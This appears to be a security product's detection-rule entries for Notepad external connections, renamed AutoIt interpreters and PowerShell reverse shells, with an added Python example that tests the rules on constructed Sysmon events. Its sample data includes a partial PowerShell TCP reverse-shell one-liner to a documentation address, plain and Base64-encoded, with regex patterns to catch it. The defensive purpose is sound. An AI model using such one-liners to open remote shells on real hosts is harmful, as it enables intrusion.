==================================================

CREATED: WIN-NOTEPAD-EXTERNAL-NETCONN (#1990)

Description

This detector identifies Windows Notepad (notepad.exe) initiating network connections to external (non-private) addresses. Notepad has no legitimate reason to reach the Internet, so such a connection usually means an adversary has injected code into the process and is proxying command-and-control traffic through it to blend in with a trusted binary.

ATT&CK Technique T1055 (Process Injection)

==================================================

CREATED: WIN-AUTOIT-RENAMED (#2000)

Description

This detector identifies renamed copies of the AutoIt script interpreter (AutoIt3.exe), recognised by the binary's original file name rather than its name on disk. Adversaries use this administrative scripting tool to deploy and run malware packaged as AutoIt scripts, renaming the interpreter to evade name-based controls.

ATT&CK Technique T1072 (Software Deployment Tools)

==================================================

CREATED: WIN-POWERSHELL-TCP-REV-SHELL (#2005)

Description

This detector identifies PowerShell launched with command-line arguments characteristic of a TCP reverse shell one-liner, for example a New-Object System.Net.Sockets.TCPClient call followed by reads and writes on the resulting stream. Adversaries use this technique to obtain interactive control of a compromised host without dropping a binary to disk.

ATT&CK Technique T1086 (PowerShell; merged into T1059.001, Command and Scripting Interpreter: PowerShell, in later ATT&CK versions)
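The following is an added worked example of the three detectors above, written here for illustration; it is not the product's own rule logic. It runs the three checks over a handful of constructed Sysmon-style events (EventID 1 = process creation, EventID 3 = network connection; the field names Image, OriginalFileName, CommandLine, DestinationIp and Initiated follow Sysmon's schema, everything else is assumed). It also shows two details a practitioner would want: an explicit list of internal ranges for the "external" test, and decoding of -EncodedCommand so that an encoded reverse shell one-liner is not missed.

```python
import base64
import ipaddress
import re
from pathlib import PureWindowsPath

# RFC 1918, loopback and link-local ranges count as internal; anything else is
# external. Listing them explicitly avoids depending on ipaddress.is_global,
# whose answer for documentation ranges such as 203.0.113.0/24 varies by version.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7",
)]

# Indicators of the classic PowerShell TCP reverse shell one-liner.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"New-Object\s+(?:System\.)?Net\.Sockets\.TcpClient", re.IGNORECASE),
    re.compile(r"\.GetStream\(\)", re.IGNORECASE),
]
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded payload of -e/-enc/-EncodedCommand (Base64 of UTF-16LE)
    so that pattern matching also covers encoded one-liners."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def notepad_external_netconn(ev: dict) -> bool:
    return (ev.get("EventID") == 3
            and PureWindowsPath(ev["Image"]).name.lower() == "notepad.exe"
            and ev.get("Initiated", False)
            and is_external(ev["DestinationIp"]))


def autoit_renamed(ev: dict) -> bool:
    # OriginalFileName comes from the PE version resource; a renamed copy keeps it.
    # Caveat: an adversary who strips the version resource evades this check.
    if ev.get("EventID") != 1:
        return False
    original = ev.get("OriginalFileName", "").lower()
    on_disk = PureWindowsPath(ev["Image"]).name.lower()
    return original == "autoit3.exe" and on_disk != original


def powershell_tcp_rev_shell(ev: dict) -> bool:
    if ev.get("EventID") != 1:
        return False
    if PureWindowsPath(ev["Image"]).name.lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = decode_encoded_command(ev.get("CommandLine", ""))
    return all(p.search(cmd) for p in REVERSE_SHELL_PATTERNS)


DETECTORS = {
    "WIN-NOTEPAD-EXTERNAL-NETCONN": notepad_external_netconn,
    "WIN-AUTOIT-RENAMED": autoit_renamed,
    "WIN-POWERSHELL-TCP-REV-SHELL": powershell_tcp_rev_shell,
}


def run_detectors(events):
    """Return (event index, detector name) for every event a detector fires on."""
    return [(i, name) for i, ev in enumerate(events)
            for name, fn in DETECTORS.items() if fn(ev)]


# Constructed sample events (not real telemetry). 203.0.113.10 is a documentation address.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ONE_LINER = "$c=New-Object System.Net.Sockets.TCPClient('203.0.113.10',4444);$s=$c.GetStream();"
ENCODED = base64.b64encode(ONE_LINER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe", "Initiated": True,
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
    {"EventID": 1, "Image": r"C:\Users\Public\svchost.exe",
     "OriginalFileName": "AutoIt3.exe", "CommandLine": "svchost.exe payload.a3x"},
    {"EventID": 1, "Image": r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe",
     "OriginalFileName": "AutoIt3.exe", "CommandLine": "AutoIt3.exe build.au3"},
    {"EventID": 1, "Image": PS_IMAGE, "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell -nop -c "' + ONE_LINER + '"'},
    {"EventID": 1, "Image": PS_IMAGE, "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -Command Get-Service"},
    {"EventID": 1, "Image": PS_IMAGE, "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -w hidden -enc " + ENCODED},
]

if __name__ == "__main__":
    for idx, name in run_detectors(SAMPLE_EVENTS):
        print(f"{name}: event {idx} {SAMPLE_EVENTS[idx]['Image']}")
```

Running the block fires the Notepad detector only on the connection to the external address, the AutoIt detector only on the copy renamed to svchost.exe, and the reverse shell detector on both the plain and the Base64-encoded one-liner but not on the benign Get-Service invocation. The explicit internal-range list is deliberate: tuning it to the organisation's own address space is what keeps the Notepad rule from firing on proxies and internal file servers.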
